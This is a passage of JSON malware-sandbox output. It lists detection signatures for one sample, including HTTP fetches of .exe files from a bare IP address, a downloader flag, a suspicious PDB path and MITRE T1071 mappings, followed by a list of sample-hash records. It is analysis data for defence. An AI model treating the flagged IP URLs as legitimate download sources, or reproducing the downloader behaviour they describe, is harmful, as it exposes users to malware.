name"},{"suspicious_request":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"suspicious_request":"http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com"}],"new_data":[],"alert":false,"families":[]},{"name":"network_http","description":"Performs some HTTP requests","categories":["network"],"severity":2,"weight":1,"confidence":30,"references":[],"data":[{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com"}],"new_data":[],"alert":false,"families":[]},{"name":"static_pe_pdbpath","description":"The PE file contains a suspicious PDB path","categories":["static"],"severity":2,"weight":1,"confidence":80,"references":["https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"],"data":[{"anomaly":"the pdb path contains a reference to a development path or term that may suggest a non-enterprise environment development/compilation"},{"pdbpath":"C:\\Users\\lengo\\Desktop\\Spamming Work\\Duy\\PyApp\\workplace\\curl\\Dll1\\Release\\Dll1.pdb"}],"new_data":[],"alert":false,"families":[]},{"name":"network_questionable_http_path","description":"Makes a suspicious HTTP request to a commonly exploitable directory with questionable file ext","categories":["network"],"severity":3,"weight":1,"confidence":100,"references":[],"data":[{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com"},{"url":"http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"},{"url":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"}],"new_data":[],"alert":false,"families":[]},{"name":"network_ip_exe","description":"Executable is attempted to be downloaded from an IP","categories":["network","downloader"],"severity":5,"weight":1,"confidence":100,"references":[],"data":[{"request":"http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"}],"new_data":[],"alert":false,"families":[]}],"malscore":6,"ttps":[{"signature":"stealth_network","ttps":["T1071"],"mbcs":["OC0006","C0002","OC0006","C0002"]},{"signature":"network_cnc_http","ttps":["T1071"],"mbcs":["OB0004","B0033","OC0006","C0002"]},{"signature":"network_ip_exe","ttps":["T1071"],"mbcs":["OC0006","C0002","OC0006","C0002"]},{"signature":"network_http","ttps":["T1071"],"mbcs":["OC0006","C0002"]},{"signature":"network_questionable_http_path","ttps":["T1071"],"mbcs":["OC0006","C0002","OC0006","C0002"]},{"signature":"static_pe_pdbpath","ttps":["T1071"],"mbcs":["OC0006","C0002","OC0006","C0002"]}],"malstatus":"Suspicious","md5":"40784dca35fa06d4c4cb932e101e56ab"}
{"_id":"e37c838dc5eaa1b302ffbd8721c6a5f52a068e8f78bbec63b19b950462fe6cf8","sha256":"e37c838dc5eaa1b302ffbd8721c6a5f52a068e8f78bbec63b19b950462fe6cf8","task_id":1,"timestamp":1777366068.907416,"has_report":true,"report_cache_hash":"97fbf2451ebb12a44733cfed3a15c211684aa82caeb56d1776953aec7f5c45fa"}
{"_id":"9a5ff998dbf0f6923d0b454d89800fb4","md5":"9a5ff998dbf0f6923d0b454d89800fb4","task_id":"280","timestamp":1776926588.3689904,"has_report":true}
{"_id":"8589cf7187567a34e487cc53ecfe2285","md5":"8589cf7187567a34e487cc53ecfe2285","task_id":288,"timestamp":1777198759.8967142,"has_report":true}
{"_id":"be0930fc1d862072effdd01493361fb5","md5":"be0930fc1d862072effdd01493361fb5","task_id":"1","timestamp":1777214307.421223,"has_report":true}
{"_id":"c2bf2a9e6beaff5b5321917475545ef4","md5":"c2bf2a9e6beaff5b5321917475545ef4","task_id":"2","timestamp":1777221353.0536544,"has_report":true}
{"_id":"74bb3514f737d1386b7ced741ec1e098","md5":"74bb3514f737d1386b7ced741ec1e098","task_id":195,"timestamp":1777201224.3801856,"has_report":true}
{"_id":"6ba13af0263cd61f957f2ce738120c8a419e1eb157e489bc79f1d57ad8277324","sha256":"6ba13af0263cd61f957f2ce738120c8a419e1eb157e489bc79f1d57ad8277324","task_id":2,"timestamp":1777365889.5328627,"has_report":true,"report_cache_hash":"2f963342d9f65f462c3a10407f6533613a385ccee6c1a60defa78a03c2d6adb6"}
{"_id":"02aa8cabeea2a0120a31adbf0886f821d10953fc6d4d9cd1959568093c48b04d","sha256":"02aa8cabeea2a0120a31adbf0886f821d10953fc6d4d9cd1959568093c48b04d","task_id":3,"timestamp":1777466809.95765,"has_report":true,"report_cache_hash":"f1806168ceb8d45c03c860397c0730699b6bb4e9a1a71c6b71adc1eec9fef629"}
{"_id":"2aa5ce3561dc657a157460383c7c9b8db54ac8a6969627009c8d1062316a6130","sha256":"2aa5ce3561dc657a157460383c7c9b8db54ac8a6969627009c8d1062316a6130","task_id":63,"timestamp":1779384319.2373335,"has_report":true,"report_cache_hash":"ce3b318f6ef22967fbd23b9931920285b20426aaf168d5b7e214290b3a97f1e7"}
{"_id":"c5ae6f6ec23fd8d5ba1343e49bf805bbc016545715a413227bd5afe9c795002e","sha256":"c5ae6f6ec23fd8d5ba1343e49bf805bbc016545715a413227bd5afe9c795002e","task_id":7,"timestamp":1777437267.6743455,"has_report":true,"report_cache_hash":"88ca122e14e29bfccb2bd4b83fecb2ec192603983c19283ed1f890e23318ff60"}
{"_id":"360e6f2288b6c8364159e80330b9af83f2d561929d206bc1e1e5f1585432b28f","sha256":"360e6f2288b6c8364159e80330b9af83f2d561929d206bc1e1e5f1585432b28f","task_id":"58","timestamp":1779096403.9246337,"has_report":true,"report_cache_hash":"a24833362098bbbf6c9de5e5280018556184c037439f0a9b918d14a81625e7b2"}
{"_id":"4792cd702b952d39c1cd215f842223b96e2c17ce9981629cce63014bf095329e","sha256":"4792cd702b952d39c1cd215f842223b96e2c17ce9981629cce63014bf095329e","task_id":"10","timestamp":1777476215.509207,"has_report":true,"report_cache_hash":"4784f9d9f1c29fb1b6660d9ddfdf7e672e5005378e7630fa1afd549581b509ff"}
{"_id":"f36047d7ce108d834458cb5c21c26238f52883b8c56d7bfa7760cbd3bab7c4bf","sha256":"f36047d7ce108d834458cb5c21c26238f52883b8c56d7bfa7760cbd3bab7c4bf","task_id":52,"timestamp":1779088499.2140024,"has_report":true,"report_cache_hash":"b64cbdd6ad67cbe1917a1d0c4ecfb3b5d63a8c32d17563ea78052096782b3acb"}
{"_id":"dccfa4b16aa79e273cc7ffc35493c495a7fd09f92a4b790f2dc41c65f64d5378","sha256":"dccfa4b16aa79e273cc7ffc35493c495a7fd09f92a4b790f2dc41c65f64d5378","task_id":77,"timestamp":1779640818.6685438,"has_report":true,"report_cache_hash":"da8e7fdaf3f52efc85d8208beb5f793e61f67c280f6d38dc7315d6bc3fd1931e"}
{"_id":"a14055e8b09fd980e82a3eb551fe7ca60018b5486d46e462fda29ee88f252ca0","sha256":"a14055e8b09fd980e82a3eb551fe7ca60018b5486d46e462fda29ee88f252ca0","task_id":"78","timestamp":1779637756.3467522,"has_report":true,"report_cache_hash":"2ab38a2b0c8889a29967fa0931911d18504a18766978a6701a3ef88956208b33"}
{"_id":"637175bedfe6852886341e15c4d48241d7a58083a45272df0aac35469c653f6f","sha256":"637175bedfe6852886341e15c4d48241d7a58083a45272df0aac35469c653f6f","task_id":"82","timestamp":1779689743.5351837,"has_report":true,"report_cache_hash":"d739107c51ad49f91192f1f374095a5ce979beda4b6c5f7c63de4bb310cfa5a0"}
{"_id":"bc1363062c4f4aff514d71fd85fc9a5a08ad7fc2ea9a40298bb8865d041b8a3f","sha256":"bc1363062c4f4aff514d71fd85fc9a5a08ad7fc2ea9a40298bb8865d041b8a3f","task_id":"84","timestamp":1779708593.9443917,"has_report":true,"report_cache_hash":"ed9e7d2a2b2294cd1cf76446361aba47d3c27fe7ba3e8d3b130f543dd483caa4"}